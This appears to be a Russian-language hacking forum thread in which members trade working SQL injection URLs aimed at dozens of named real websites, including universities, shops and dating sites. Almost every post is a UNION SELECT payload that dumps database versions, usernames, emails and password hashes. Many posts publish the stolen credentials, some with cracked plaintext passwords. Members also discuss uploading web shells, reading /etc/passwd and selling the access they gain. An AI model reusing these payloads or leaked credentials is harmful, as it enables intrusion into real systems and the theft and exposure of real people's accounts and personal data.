http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,username,passwor d),3+from+hardvision.adrobot_affiliates/*
hardvision:0b1f34d5c98ace48972bf71ccb6d5218:mityap 13

http://toyota-opa.ru/articles.php?m=-1'%20union+select+1,concat_ws(0x2F,version(),datab ase(),user()),3,4,5,6,7,8/*
5.0.45/opa/root@localhost

http://www.vitz.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),datab ase(),user()),3,4,5,6,7,8/*
5.0.45/vitz_2/root@localhost

http://www.raum.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),datab ase(),user()),3,4,5,6,7,8/*
5.0.45/vitz/root@localhost

mobilka.com.ua


_http://mobilka.com.ua/melodies/download.php?id=-3206+union+select+1,version(),3,4,5,6--

Hande hoch! Gitler kaput! Ich bin bose!
http://www.fulde-versicherungen.de/efnews/index.php?shownews=2'+UNION+SELECT+1,2,username,4, pwd,6,7,8,9,10,11,12+FROM+ef01pfuser/*

RANX.ru Знакомства по фотографиям! Без громоздких анкет!



http://ranx.ru/?showFoto=-1+union+select+1,2,concat_ws(0x3a,name,password,em ail),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user s/*

Андрей:pas$w0rd:info@ranx.ru - админ
Антон:ranx.ru:myxolove@mail.ru
ГУЛЬНАРА:timeryn04:gulyaniz@mail.ru

пароли были в Base64 :)

ребята кто поможет с хешем $1$AOOiO7Zi$2he3AqhhFU8197ojSz9bn/
очень срочно нада базы непринимают пишут что некоректный но он таков и нада както его росшифравать сменя +++

эта тема для скулей. тебе сюда http://forum.antichat.ru/showthread.php?p=585987 пост #2464.

http://www.donny.co.uk/rovers/news.php?ID=-57+union+select+1,admin_id,3,4,5,6,admin_email,adm in_pass,9,10,11+from+zenadmin/*
В information_schema.tables подглядел еще таблицы:
forums2_acl_users
phplist_rssitem_user
phplist_user_user
ttrss_users
Чтоб просмотреть их колонки надо будет зашифровать в hex.(Спасибо тохе :) )

http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password ,user_email,10+from+phpbb_users+limit+1,1/*

http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password ,user_email,10+from+phpbb_users+limit+1,1/*
Hacked by [WSWW] teAm
cупер хекеры мля =\ умно смотреть ачат а потом дефить

NFM, SUBJECT617,
вот верная таблица форума:
http://www.parkui.ru/news.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,user_password),9,10+from+park_phpbb_users+limi t+1,1/*

http://untp.kiev.ua/test.php?id=1%20UNION%20ALL%20SELECT%201,2,databas e(),4,psevdo,6%20from%20pages%20%20/*
MySQL 4.0.27 :(
но таблицу подобрал только одну да и то вряд ли полезную (да и колонки впадло подбирать)
http://untp.kiev.ua/adminka/
знать бы еще куда она смотрит
там же есть IPB, но его таблицы тоже не нашел

там же есть IPB, но его таблицы тоже не нашелтам несложно догадаться
email+name
://untp.kiev.ua/test.php?id=1%20union%20 select%201,2,concat_ws(0x3a,email,name),4,5,6+from +untp.ibf_members
hash+salt
://untp.kiev.ua/test.php?id=1%20 union%20select%201,2,concat_ws(0x3a,converge_pass_ hash,converge_pass_salt),4,5,6+from+untp.ibf_membe rs_converge

www.pchelenok.ru

Уязвимость в скрипте который отображает товары:

http://www.pchelenok.ru/index.php?action=show_item&parent=1'

Просмотр информации:

http://www.pchelenok.ru/index.php?action=show_item&parent=-00032308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5/*

Информация о базе:

4.1.22
pchelenok_mysql@10.1.46.118
pchelenok_db

Я канешн понимаю что недохек, но таблицы хоть немного похожей на таблицу юзверей я не нашел, да БД мне заявила что таблицы parol не существует, хотя как видно из урла ниже она там есть. http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,table_name,6+from+informat ion_schema.tables/*


А вот и колонки таблицы парол
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,column_name,6+from+informa tion_schema.columns+where+table_name=0x7061726f6c/*


Мож вы разберетесь... :confused:

Ув. тов. SUBJECT617, все очень просто: БД, с которой работает скрипт называется "mitsubis_auto", а таблица parol в БД "test". Правильный запрос будет:

http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,unhex(hex(passvord)),6+fro m+test.parol/*


Вы не учитываете поле таблицы INFORMATION_SCHEMA.TABLES table_schema.

нету таблицы parol изза того что не из той базы просиш.

Колонки mos_users
http://www.seacoastrugby.org/news.php?id=-174+union+select+1,2,column_name,4+from+informatio n_schema.columns+where+table_name=0x6d6f735f757365 7273/*

Ну и собсно сам mos_users
http://www.seacoastrugby.org/news.php?id=-174+union+select+1,2,username,password+from+mos_us ers/*

================================================== =================================================

http://www.umic.co.uk/about_umic/news.php?id=-123+union+select+1,user,password,4,5,6,7,8,9,10+fr om+mysql.user/*
http://www.umic.co.uk/about_umic/news.php?id=-123+union+select+1,name,password,4,5,6,7,8,9,10+fr om+nanoeprint.admin_user/*

http://favoriteagent.com/lcm/b/?p=30&agent=-94226 union select 1,2,version(),4/*
Db:5.0.22
user:Mljones@localhost
DB:F_agent
Т.к mysql 5 кому нужно таблицы можно FROM INFORMATION_SCHEMA.TABLES выташить ;)

http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,id,5+from+user/*
http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,sername,5+from+ user/*

Как я понял столбец id и есть пасс, просто другого похожего нет =\ Гляньте сами если хотите:
http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,column_name,5+f rom+information_schema.columns+where+table_name='u ser'/*

Итак приступим, edu, жЫрненькие? по мере возрастания PR :) :

PR-5


http://www.irhe.upenn.edu/ExpertsDt.php?Id=-1+union+select+concat_ws(0x3a,table_schema,table_n ame,column_name),2,3,4,5+from+information_schema.c olumns/*


Никаких дамперов и лимитов ручками. Не забываем, что мы сидим под thelea2_tla, соответственно вывести значения таблиц и колумнофф можно только из этой table_schema.Версия пятая, все таблицы на страницу.
_________________________________________
PR-7

http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,concat_ws(0x3A3a,table_schema ,table_name,column_name),5+from+information_schema .columns/*

В дополнение к первой. Всё выводится сразу, но сидим под faculty, и нифига там интересного нет :(
_________________________________________
PR-7

http://www.lpl.arizona.edu/calendar/calendar.php?ID=-107'+union+select+1,concat_ws(0x3A3a,version(),dat abase(),user()),3,4,5,6,7,8,9,10/*
4.0.21-log::lpl::lpl_visitor@localhost

PR-7

Таблицы надо брутить, неподобрал. :(

_________________________________________
PR-8


http://www2.umaine.edu/graduate/article.php?id=-63'+union+select+1,concat_ws(0x3A3a,username,passw ord),3,4+from+users+limit+0,1/*
Некоторые хэши сбрутились:

scott::d86132c5a02abe421a25538c38c9fd5b : graduate
dianne::0fd8c5fc4774d881a5e66afa9db79909
ama::d86132c5a02abe421a25538c38c9fd5b graduate
jouellette::4761ba599b4903af7b03abc18a9b459b maizie
ashleigh::359cfaf665a96b70df53f5d61175b2a7
lamsond::5e95eb6d88a0a19cf37a7007909d5a9a aiden01
julia::7403b99d96316dc7d67323bae10a44fa

Админка - http://www.umaine.edu/admin/login.asp
Пасы не подходят (((

_________________________________________
Ещё накрутил с картоном, но здесь тематика вроде неразрешена, выкладывать не буду, и так найдёте :)

Добро пожаловать в корпорацию Биосфера!
http://www.biosfera.biz/admin/login.php

http://www.biosfera.biz/news.php?id=0+union+select+1,2,login,4,passwd,6+fr om+account+limit+0,1/*

Новость 'login' и ниже пасс непонятно в каком виде. Админка выше. Кто админ хз, всего 4 чела зарегины. Если кому надо будет сам разберется. ;)

http://www.laemmle.com/viewmovie.php?mid=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,database(),user(),12,13,14,15,16 ,version(),18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42/*

Ещё еда, PR-6.


http://french.berkeley.edu/news/news_events_ind.php?id=-53+union+select+1,2,concat_ws(0x3A3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26/*

4.1.20-log::davidpet@localhost::french_dept_db

Знакомства на Prostitytki.ru - секс досуг интим услуги эротические рассказы порно истории досуг и интим с девушками.

http://prostitytki.ru/erotikslibs/comment.php?ID=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5+from+system_user/*

denis:tutkin
kostya:kostya


Onal.ru - эротика и фотографии а также Интим-услуги, девушек Москвы для состоятельных мужчин

http://onal.ru/erolib/alist.php?aid=2575&link=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+sys tem_user/*

kostya:kostya
denis:tutkin

http://onal.ru/erolib/alist.php?aid=2575&link=-1+union+select+1,concat_ws(0x3a,name,pass,email),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+au tors/*

acburen:n0exsup611:acburen@yandex.ru


Знакомства - mobipage.ru


http://flirt.mobipage.ru/index.php?page=view&uid=-1+union+select+1,2,3,concat_ws(0x3a,login,pass,mai l),5,6,7+from+users/*


p.kiev.ua - Разработка сайтов, создание сайтов, web дизайн, раскрутка сайтов -> Дизайн-студия "Полюс-Альфа"

http://p.kiev.ua/no_flash.php?page=lessons&workID=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,login,password,url),12,13,14,15,16+from+statistic s_sites/*

okna:12345:www.perfect-okna.ru

www.setguul.mn

http://www.setguul.mn/index.php?str=newsdata&newsid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,u serpass,usermail),7+from+t_users/*

www.bmoca.org
_http://www.bmoca.org/artist.php?id=-74+union+select+1,username,password,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +users/*

http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=-1/**/union/**/select/**/0,1,2,name,password,5,6,7+from+gd_member/*

Дорк: inurl:"view.php?id=" inurl:"shop"

http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=-1/**/union/**/select/**/0,1,2,name,password,5,6,7+from+gd_member/*

Дорк: inurl:"view.php?id=" inurl:"shop"

это не дорк. сайтов с такими урлами много ;)

http://proge.info/news/news.php?id=-1+union+select+1,2,user_password,username,5,6+from +users+limit+1,1/*

Могли бы хоть в библиотеке программистов не проглядеть это =\

====================================

http://www.zerecords.com/artists/artist.php?id=-19+union+select+1,login,passwd,4,5,6,7,8,9,10,11,1 2+from+user/*

Логин - admin, пароль - все остальное... Чет меня сначала смущала надпись сверху что я аж незаметил написанного чуть ниже 23...

http://torrentz.ru/search.php?kwds=ss'+union+select+1,table_name,3,4, 5,6,7,8+from+information_schema.tables/*&cat=0

http://videoart.virtualmuseum.ca/artist.php?id=-13+union+select+1,username,user_password,user_emai l,5,6,7,8,9,10+from+drupal_DEV.bb_users+limit+0,1/*
About admin=) Красиво выдано.. Есть еще столбец user_icq. База кажется большая, я только непонял чо эт за сайт. Типа youtube вроде...

http://www.afrodita.ru/fastsearch.php?genderme=1&genderyouu=2&foto=1&intim=0&age1=&age2=0'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,concat_ws(char(58),login,passw),1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+USERS/*

красота :)
большая база мыл.. если покапаться - можно найти интимные фотки ;)

http://www.warconent.com/artist.php?id=-12+union+select+1,phpQid,passwd,4,5,6,7,8,9,10,11, 12,13,14+from+phpqadmin/*
Почемуто столбца с username небыло...

http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e


http://psyedu.ru/admin ;)

Мона через создании статьи залить shell???

_http://www.bsigroup.ru/outgoing/news.php?id=0%27+union+select+1,2,3,4,5,6,7,8,conc at_ws(0x3a,_login_xz,_pass_xz),10+from+_system_use r/*

login:password в MD5

salzman:gctdlj
svetlana:789258

два штуки удалось расшифровать

http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e


http://psyedu.ru/admin ;)

Мона через создании статьи залить shell???

Можно,если админка php или ещё какая,но не html =_=.
Мне чето чаще попадаются именно хтмл =_=.Попробуй через аплоад(хотя врядли получицо).А вообще в каждой админке,если она не самописная,есь свои дыры =_=,а то придёццо искать исходники =________________=

просто обыныя страница ;)

http://hayam.spinners.ru/view_thisf.php?i=-681%20union%20select%201,version(),3,4/*
VER:4.0.27-max-log
DB:zagorsk5
DBUSER:zagorsk5@v16.valuehost.ru

Woonsanmall.com
http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,m_ id,name,password)+from+gd_member/*

Интернет Магазины:

2002fifa.com
http://www.2002fifa.com/shop/board/view.php?id=movie&no=5'+union+select+1,2,3,4,5,6,7,8/*

и еще докручу потом)
https://shop.invictusnetworks.com/detail.php?id=16030'
http://rus.militaryantiqueshop.com/view.php?id=439'
http://mandbshop.com/shop/bbs/view.php?id=faq&page=1'

Youleemall.com
http://youleemall.com/shop/board/view.php?id=franchise&no=3+union+select+1,2,3,4,version(),6,7,8/*

http://www.vpole.ru/press/?id=-1467+union+select+1,aes_decrypt(AES_ENCRYPT(concat (0x3a,passwd),char(40)),char(40)),version(),4,5,6, 7+from+users+limit+0,1/*
все поля, что смог добыть. хотя там еще fio вроде есть, но толку нету :)

http://zaraev.ru/interv.php?table=thirdt&id=-1+union+select+1,2,3,concat_ws(0x3a,ID_GROUP,membe rName,passwd,passwordSalt)+from+smf_members
ФОРУМ:
webmaster:9a4e3f3d060b2fe1d6006058608d899f5fd12df4 :9d2e
ak1nok:53aef746035f578fa4d9ce8ef7fe511d094e5174:6b 20

http://www.ortho-media.ru/index.php?p=2&n=-185+union+select+1,2,concat_ws(0x3a,username,user_ password),4,5,6,7,8,9,0,11+from+phpbb_users+where+ user_level=1+limit+0,1
Админы форума:
admin:2aea4662595bb1c87f4217ac802447d5
Сергей Чапнин:e27a05392d79b6e32d26c3829eeca755:pots dam
Роман Наумов:0a0b3fef760c72c912f922e3f6f2d173

http://www.buddhism.ru/info/tour.php?id=1829999+union+select+table_name+from+i nformation_schema.columns+where+column_name+like+c har(37,112,97,115,37)+limit+0,1

http://www.pernod-ricard-usa.com/media/pr.php?id=-26'+union+select+concat_ws(0x3A3a,user,password)+f rom+mysql.user/*&pr_id=167

В обратном порядке:
prusa::798aedc01f3da90f
horde::5a53dc5b3d8c9efd
pma_0KbygRTartGC::52946058691b483a
admin::1e634b394cd6be54

www.anglus.pl


http://www.anglus.pl/?p=news&id=-1+union+select+concat_ws(0x3a,login,mail),2,3,4,5, 6,7,8+from+admin+where+id=1/*


www.fertiligene.com

http://www.fertiligene.com/page.php?coul=1&idproduit=-1+union+select+1,table_name,3,4,5+FROM+INFORMATION _SCHEMA.TABLES/*

http://www.sitesled.com/view_video.php?ID=-14+union+select+1,2,3,4,convert(concat_ws(0x3A3a,u sername,p
assword,id,email)+using+latin1),6,7+from+users/*


Jay::908880209a64ea539ae8dc5fdb7e0a91::1::stock

Chad::f80bd3a3fde257f42721cb16f7ff87a8::2

Rattler::de1b2a7baf7850243db71c4abd4e5a39::3

еще чуток edu


http://inbt.jhu.edu/facultyexpertise.php?id=personalresult&usr=-111+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21/*

http://www.ncat.edu/press_releases/disp_release.php?ID=-111+UNION+SELECT+1,2,3,4%20%20,5,6,7,8,9,10,11,12, 13,VERSION(),15,16,17,18/*

мылa(будет долго думать 1-2мин.)
http://www.women-medcenter.ru/index.phtml?id=259'+union+select+1,mail+from+guest/*

fcshirtshop.com


http://fcshirtshop.com/?category=-1+union+select+table_name+from+information_schema. columns+where+column_name=0x70617373776f7264/*

www.pirok.ru/news.php?id=-1+union+select+1,2,name,4,password,6+from+admin/*

сверху логин, снизу пароль админа
Админка по адресу: www.pirok.ru/admin

различные смс-билинги:
http://www.3bill.com/casestudy.html?client_id=-1+UNION+SELECT+1,CONCAT(0x6472385F3838777777333371 ,concat(column_name),0x686874666638385F363632),3,4 ,5,6,7+FROM+information_schema.columns+where+table _name='clients'+limit+1,1/*
клиентская часть кстати на другой машине:
http://client.3bill.com/extranet/client_pages/cms/lib/exportXML.php?clientid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*&service=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*&sort=ASC&sheet=detailList.xsl
client_name
description
client_logo
case_study
picture
sortorder
COLLATIONS
cc_audit
ccdata
charge_model
client_rights
clientrate
clientv2_adodblog
configuration
credit_status
creditnote_lines
creditnotes
cron_manager
prod_3bill:ccdata
cc_audit
ccdata
charge_model
client_rights
clientrate
clientv2_adodblog
configuration
credit_status
creditnote_lines
creditnotes
cron_manager
cron_manager_log
defaultrate
defaultrate_copy
delivery_method
показун:
http://www.pokazun.ru/sms.php?showDescr=1&pl=1100+union+select+1+from+users_advPlaces/*
посимвольным брутом..
ещё 1 буржуйский с пр6:
http://mblox.com/news/press-announcements/press_release.php?press_id=11'+UNION+SELECT+1,conc at(email_name,0x3b,email),3,4,5,6,7+FROM+careers+l imit+1,1/*
mbloxwebdb:careers
mbloxwebdb:contact_us_countries
mbloxwebdb:doc_reg
mbloxwebdb:enquiry
mbloxwebdb:events
mbloxwebdb:industry_news
mbloxwebdb:press_release
mbloxwebdb:short_code
mbloxwebdb:careers
mbloxwebdb:contact_us_countries
mbloxwebdb:doc_reg
mbloxwebdb:enquiry
mbloxwebdb:events
mbloxwebdb:industry_news
mbloxwebdb:press_release
mbloxwebdb:short_code
career_id
department
title
location
description
email
email_name
publish
id
local
country
send_to
id
name
email
company
country
browser
ip
date_created
id
name
email
telephone
company
country
country_other
industry
enquiry
sentto
browser
ip
date_created
event_id
title
location
date
enddate
message
logo
minilogo
email
event_link
info_link
shortcode_id
shortcode
country
company
phone_number
так что грабить смсками растяжимое понятие)

на последок старичок:
http://www.digiseller.ru/outside/default.asp?searchstr=--
может кто то и раскрутит)

RussianSt.com - Русскоязычный Портал: Интернет-Каталог, Каталог Бизнесов, Аукцион, Почта, Доски Объявлений, Форум, Чат, Развлечения, Справочная..


http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+AUSER/*


andylv:andy2a:andylv@ukr.net
eliz:Godisov:eliz@r66.ru

http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+firm/*

madina:b98facb4a69f2a46b22a54890e2b60f1:madina@qui ntetmortgage.com
rusworld:e04e5ecd5ef138690e3ec40a486ea6a1:RussianW orld@hotmail.com
bexpress:42c391321d55118cf2ce5e33964edb33:RussianW orld@hotmail.com

http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,name,password,email) +from+chat_users/*

admin:MfPlkg:work@russianst.com
ADMINISTRATOR:3JOIQm:www@russianst.com

http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+meet_board/*

glas1976:Ls38T:qwe-80@bk.ru
znax:M7hli:znax@bk.ru
Forsems:C0apt:nvtraderu@gmail.com

http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+sell_board/*

m8t4t0o0w3v8:guNo4:f2k7j0c6o0s5@gmail.com
1363716:cHS39:infobalt3@yandex.ru
werxerty:NQU2G:malcom2007@km.ru

http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+service_board/*

vjgfp:GmOj3:mopaz_market@kaluga.ru
gribok:O1lB9:gribka-net@yandex.ru
computp:0GHNA:uslugicomp@yandex.ru

http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+work_board/*

virusds:fo3e1:financialfreedom@mail.ru
pav--eldm:4YW0y:paveldmitriev@bk.ru
piciolog:OOOQX:piciolog@tut.by

http://www.minskvodstroy.by/index.php?p=gallerypic&img_id=-86+union+select+1,2,3,concat_ws(char(124),email,pa ss),5,6,7,8,9+from+minbud_user+limit+2,1--&galid=6&area=1&ascdesc=desc

1 cdea86d0b320a9485cc1ab925603d4ab ytrewq admin@minskvodstroy.by

Там еще шел лежит )) ;)

http://azart.net.ua/bookmakers/catalog/?SECT=-1'+union+select+concat('%3Cbr%3E',version(),'%3Cbr %3E',user(),'%3Cbr%3E',database())/*

Comingsoon.net
http://www.comingsoon.net/films.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
вывод в <meta name="DESCRIPTION" content="4.1.22:comingso_nextra:comingso_nextra@csn-node1-int">

Aen.ru
http://www.aen.ru/?page=article&category=politics&article_id=-1+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7/*

Bmoca.org
http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,username,3,4,passwo rd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25+from+users--

Eicta.org
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(version())),2,3,4,5,6,7,8 ,9,10,11,12--

Bti.cornell.edu - Еда
http://bti.cornell.edu/pgrp/pgrp.php?id=201'

Freedocumentaries.org
http://freedocumentaries.org/film.php?id=-1+union+select+1/*
подбор?

Umpcportal.com
http://www.umpcportal.com/products/product.php?id=1'
скуль?

небольшой магазин
http://www.landmetzgerei.at/

http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить

Лови:
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,versio n(),user(),database())+using+latin1),4,5,6,7,8,9/*
Таблицы не подбирал, это уж сам давай.
_____________________________

Цель - media.mit.edu, пр8, начал копать

http://affect.media.mit.edu/projects.php?id=-1935+union+select+1,2,3,concat_ws(0x3A3a,user,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+mysql.user/*

таблицы не подобрал.
Хеши которые сбрутились:

Quote:root::1c3b7f0b58c961df :: DufwtDB!
antigroupware::3f6686f4521deef9 :: wonderful
rcaneel::0d90c1511e59b951 :: failsafe

остальные в очереди.

На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.

Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.

Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.

Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.

если есть доступ к mysql.user.. как нащет file_priv?
сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности.
mit.edu/admin - раскрытие путей.. (кое каких)
ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд...
это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))

http://www.rosana.de

http://www.rosana.de/main.asp?main=-1'+union+select+1,concat_ws(0x3a,user,password),3, 4,5,6+from+mysql.user/*

http://www.alpinestars.se

http://www.alpinestars.se/MainVisaUnderBild.asp?nid=1+or+1=(SELECT+TOP+1+cas t(user+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarc har)+FROM+users)--

Polemika.com.ua
http://polemika.com.ua/index.php?action=image&image_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,password,email)+from+user+where+id=2--

вывод в txt файл..)

да скуль
_http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,user(),3,4,version( ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25--

http://bootsus.bri-global.com/
http://bootsus.bri-global.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(admin_usern ame+as+nvarchar)%2Bchar(58)%2Bcast(admin_password+ as+nvarchar)+FROM+admin_users)--&sid=1&iid=198
http://www.theovalgroup.com/
http://www.theovalgroup.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername +as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nva rchar)+FROM+smtblUser)--&sid=2477&pid=35763
http://www.davy.co.uk/
http://www.davy.co.uk/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername +as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nva rchar)+FROM+smtblUser)--&sid=179&pid=43144

http://f1dvd.ru/index.php?p=gallerypic&img_id=-519+union+select+1,2,3,concat_ws(char(124),email,p ass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=45&area=1&ascdesc=desc&print=1

babara@mail.ru|563f311d2613a827c2d3897a024ddf74
51654

Любителям формулы 1 ))

2 sabe
Пробей, file_priv как видишь нет, я б отписал. От админки без пассов толку нет, рута ведь туда не втулишь, я видел её. И про админку я спрашивал не на этом сайте :) Тот линк я к сожалению выложить не могу, слишком дорого мне выйдет.
Рут то на media.mit.edu по идее, т.к. media.mit.edu
и mit.edu на разных серваках и ипах,соответсвенно affect.media.mit.edu откуда стянули рута, это поддомен корня media.mit.edu на этом серваке, и рут по идее должен быть к нему, а не к mit.edu, сервы то разные... Но про это я писал выше, подразумевая целевой рут.
Да в принципе я и ломал не для новостей, а сеошникам\скупщикам загнать как еду пиаристую. Как видишь всё корыстно :).

еси найдете чота интересное делитесь впечатлениями ;)
http://tusbuscadores.com/notiprensa/display.php?ID=-8077+union+select+1,2,vers ion(),4,5,6,7, 8,9/*
http://www.xpg.us/cerebra/display.php?id=-574+uni on+se lect+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,6 6,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82, 83,84,85,86/*
http://www.rayner.com/products.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9/*
http://www.naturalaquario.com/products.php?id=-2+union+select+1,version()/*
http://www.nnovia.com/products.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,version(),22,23,24,25/*

http://www.mks-ks.ru/shop/cat.php?id=-1127+union+select+1,2,3,version()/*
http://www.wekashop.de/index.php?id=-14+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3, 4,5,6,7,8,9,0/*

user - 82 -limit
name password - columns
http://www.schuetzenbund.de/shop/list.php?id=-21'+union+select+1,concat_ws(char(58),name,passwor d),3,4,5,6,7,8,9+from+user/*
admin:sh00ting

никакого картона.

Кардинг запрещен на форуме.

Чет давно нигде не копалсо )
http://www.zucc.edu.cn/zucc_list.php?id=-37+union+select+1,2,3,4,5,6/*
http://news.tsinghua.edu.cn/eng__news.php?id=-1582+order+by+12/*
http://www.cdht.gov.cn/govopen/detail.php?id=9691+union+select+1/*
http://www.cec-ceda.org.cn/rdht/comment.php?cid=-12+union+select+1,2,3,4/*

Крутить ничто не стал. Смотрите - будет что интересное - отписывайтесь )



[+] http://www.emeraldinsight.com.cn/journal.php?id=-98+union+select+1,2,3,4,5,concat_ws(0x3a,id,user,p wd),concat_ws(0x3a,user(),version(),database()),8, 9,10,11,12,13,14+from+users/*
2:dreaming:7bcde95b0707ae0f93aa6ec76745cf02
436948db@localhost:5.0.27:436948db

http://boking.ru/index.php?p=gallerypic&img_id=-65+union+select+1,2,3,concat_ws(char(124),email,pa ss),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=2&area=1&ascdesc=desc


http://boking.ru/admin/

ringo admin@ringo.ru

Если хорошо поискать можете и шел найти если кому надо ;)

https://shop.invictusnetworks.com/detail.php?id=-16008+union+select+1,version(),3,4,5,6,7,8,9,0,1,2/*
http://www.bigshoebazaar.com/showprod.php?prcd=2422+union+select+table_name+fro m+information_schema.tables/*

есчё 2 шопа

http://www.mebi.us/out.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e 2e2f6574632f706173737764/*

PHp inj :)

Umaine.edu PR8 - вкусная Еда.)
http://www2.umaine.edu/graduate/article.php?id=63'+union+select+1,aes_decrypt(aes_ encrypt(concat_ws(0x3a,username,0x2F2A2A2F,passwor d),0x71),0x71),3,4+from+users+limit+1,1/*
scott;graduate
